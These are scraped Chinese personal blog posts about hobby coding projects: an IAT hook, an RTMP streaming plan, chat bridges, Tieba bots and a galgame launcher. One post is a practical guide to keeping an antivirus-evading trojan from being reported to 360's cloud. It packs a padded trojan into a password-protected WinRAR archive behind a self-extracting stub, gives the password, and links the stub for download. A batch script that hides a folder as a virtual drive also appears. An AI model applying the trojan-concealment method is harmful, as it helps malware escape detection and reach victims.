python-IAT HOOK

难的不是HOOK,而是各种类型的转换。
先占坑。考完试再填。如果你们发现这个文章消失了的话估计就是弃坑了HHHH


2017/7/15
终于填完了,贼难受。头晕晕的,使用方式如图
IAT HOOK:
TIM截图20170714170055.png
LOAD IAT:
TIM截图20170714170432.png
代码在这里iat.rar

Tags: iat, hook

基于免杀马的永久防上报的实现以及工具

首发于 http://mapers.net/t/topic/328

两年前的一个点子,今天正好有时间。

前提:
你得马得免杀,而且我的工具是花几分钟随手写的,可能不靠谱。
其中增大文件我用的是在文件尾部增加空白数据,我记得这会被360给提示的,如果不想提示就自己写个添加随机数据的吧。反正winrar也能压缩

原理:
原理很简单,说出来可能会被笑。就是利用winrar的压缩+自解压把扩大体积后的免杀木马文件给怼成一个压缩包,因为被压缩了所以体积很小,再加上设置了密码所以即使被上报了360的云也无法自动检测出什么来。然后把压缩包追加到一个解压的壳后面又壳释放运行/
缺点:
虽然壳体积才6kb,但是加上winrar.exe体积就大了,至少300kb,所以你的文件最终体积可能是 你的木马体积+6kb壳的体积+200+winrar.exe体积,300+kb体积可是非常大的,可能某些条件下很难接受
怕手工分析,手工分析立刻翻水水。

P.S : 我只考虑防上报,免杀和过主防不在此考虑范围。壳是随便写的,所以压缩包内木马文件名称得是server.exe,不然无法启动木马,并且压缩包密码只支持coinkboom(逃

下面正式开始,首先,先找到我们的免杀马(好早之前写的,貌似不过主防),增大体积,并且给测试查杀
ed3bade92bb229aad997f654f31d9e489a018d35_1_690x410.png
然后打包为压缩文件并添加密码2.png
最后体积只有121kb,hhhhhhh
3.png
最后拉出我们的壳:
4.png
惨不忍睹啊惨不忍睹,壳本身6kb,加上rar.exe瞬间这么大了。有机会我写一个把rar.exe弄成远程下载的把。
最后利用cp把两个文件合并,得到最终的木马文件。
5.png
最后丢到虚拟机执行并且开启上报,成功执行木马。
6.png
查看上报区,空空如也7.png

毕竟40mb的东西也不好上报。
基本就这样啦。

壳在这里:链接: http://pan.baidu.com/s/1qXZh9zI 密码: wt92

就是这样辣,一个没啥用的小玩意_(:з)∠)_

Tags: 免杀

ffmpeg-rtmp搞事指南

因为有一台闲置的PI,加上直播浪潮,准备自己弄个无人点播的电台
收集了一些资料

  1. 使用FFmpeg在B站直播的姿势
  2. ffmpeg处理RTMP流媒体的命令大全
  3. ffmpeg 将1张图片和1个MP3音频文件转为MP4
  4. 利用 FFmpeg 将 MP4 转成 FLV
  5. PYTHON合并flv

预想效果:
收到点播弹幕->从网易云下载mp3文件和专辑图->合成mp4->转换为flv->合并到推送的主flv文件->推送到直播地址

希望合并到推送的主flv文件这里不会出错。

各种协议好神奇啊,可惜我只是高中生,不是大学生。不能花太多时间研究这些协议。QAQ

顺便求推荐一款语法爽快不冗杂的强类型的语言呀qwq。java和C#的语法。。。好。。长QAQ,记不下来,IDE带不动


2017/5/25

ffmpeg使用失败,太难用了,出现了几个问题

  • 没办法同时转码同时推流
  • 推流会出现间隔,没办法无间断播放
  • 十分不稳定

所以,打算,自己开始怼rtmp协议。
犹豫用golang还是py。golang的话在Pi上运行和编译略麻烦,Py的话感觉实现rtmp协议有点。。。不稳。
先收集资料

嗯,开怼。
(突然记起来,博客的点击查看大图还没写,应该就一个js绑定img标签被单机的时候弹出一个div里面放着一张大图的herf跳转应该就行了吧XD

Tags: ffmpeg, rtmp, 直播

搞事情-多博客博客&QQ群联动

1.ws后端
2.前端
初衷只是想在右下角弄个可伸缩的聊天室。所以套上了ws。
突然想着既然用了ws为何不能一个服务器多个客户(博客)一起聊天,于是就处理了一下后端
突然想着为何不能连上QQ群,这样更热闹一些。
于是就套上了smartQQ接口,自己抓包贼蛋疼
目前所有功能都已经实现,只不过就是在获取群成员的时候出了点问题
无论如何模拟都请求不到群成员信息,所以会导致聊天的时候群成员的昵称是数字
虽然并不是不能用,就是用的很不爽,当然还有一个解决办法就是手动创建一个所有群成员昵称的表来比对
虽然只剩下这么点工作量,但是我还是不想写。
懒癌发作~怠惰
反正能用就是了嘛
不部署上来也是因为懒hhhhhhh

Tags: 博客, 聊天, 联动

瞎JB乱写的一个PY-BLOG

下载地址:SuperrrrrrrrrrrrrrrrrrMiniBlog.rar
看到天台用PY写了个博客,我自己也手痒,弄了一个
不使用数据库,用文件管理,排序也用系统日期,十分节能,使用markdown语法包,直接转换,没写后台,就写了一个写文章的页面,不过要求输入密码hhhhhhh所以管理员只有一个。自己用用十分适合。
样式是扒别人的QQ截图20170102220516.jpg
hhhhh毫无技术含量。

Tags: none

开坑!没有翻译功能的VNR!(大雾

<center>程序框架</center>

程序框架如图,原本打算做个galgame的启动器
因为我的桌面干净整洁,但是硬盘里面却一团狼藉。导致下了游戏好久之后才突然记起来。

啊!原来我还有这一款游戏!!

然后,蛋疼的用Python写,Python!写!没错,蛋疼的PY,不是可视化,并且还是第一次用Wxpython。简直要哭了。
之后就写成了上面那样。。之后我就在思考。。就这样满足了吗?
随手看到VNR的主页面,惊了,竟然也是Python写的。别人写的那么牛逼,为啥我不行。
然后四处问了问,就有了如下几个计划

  1. BGM/CG提取
  2. 存档管理
  3. 一系列全自动签到
  4. 报时
  5. 任务计划提醒
  6. B站助手(包含提醒,下载,等等功能
  7. 待续....

没错,并不打算做galgame管理助手了,而是
全 方 位 管 理 助 手 !
感觉又是天坑hhhhhh
目前已经实现的

  1. 游戏添加与删除
  2. 托盘事件
    于是。。就是这么多啦(不是什么都没完成吗魂断!
Tags: python, galgame

本子站修复

就说为啥不行了,原来全部换成https了qwq
不得不承认我本子站结构设计的很差,改一个小东西得改半天+一看这源代码和屎一样
当初不想学jinjia2的渲染模板直接用+了。。。。
为何我当初不知道有装饰器这种这么TMD好用的东西呢我日。。。
想偷懒偷出事来

Tags: none

[golang]贴吧自动签到

顺便就把自动签到一起写了,我还是跑回PY了。golang用的好幸苦qwq。
在main函数那里写着你的BDUSS就行了贴吧签到.rar

Tags: none

[golang]贴吧自动抢楼机

学了golang一天了,再昨天的基础上添加了回帖功能。
程序功能就是程序开始时运行,监控某个贴吧的帖子,一有新帖上了首页就自动回帖。
因为是检测首页而不是检测时间,所以会把挖上来的坟贴也会回复。
程序设置是30秒检测一次,暂时只支持监控一个贴吧。
第一个完全成型的作品,试着熟悉了下golang的文本操作,数组处理,web请求和正则表达式
程序很简单,代码如下:点我下载
因为现在百度登陆都有验证码,然后,控制台里的验证码不好复制,我就丢到text.txt里面了,运行的时候请打开这个文档去查看验证码并且输入

Tags: golang

隐藏文件技巧---让你的电脑多出一个O盘

事先说明,这段脚本不是我写的_(:3」∠)_,只是非常早之前搜集的,现在发现竟然还有
代码如下

@ECHO OFF

    MD D:\RECYCLED\UDrives.{25336920-03F9-11CF-8FD0-00AA00686F13}>NUL

    IF EXIST O:\NUL GOTO DELETE

    SUBST O: D:\RECYCLED\UDrives.{25336920-03F9-11CF-8FD0-00AA00686F13}

    START

    O:\

    GOTO END

    :delete

    SUBST /D O:

    :END

就是用D盘卷标多创建个虚拟磁盘,详情subst介绍以及使用方法

Tags: 批处理, 隐藏文件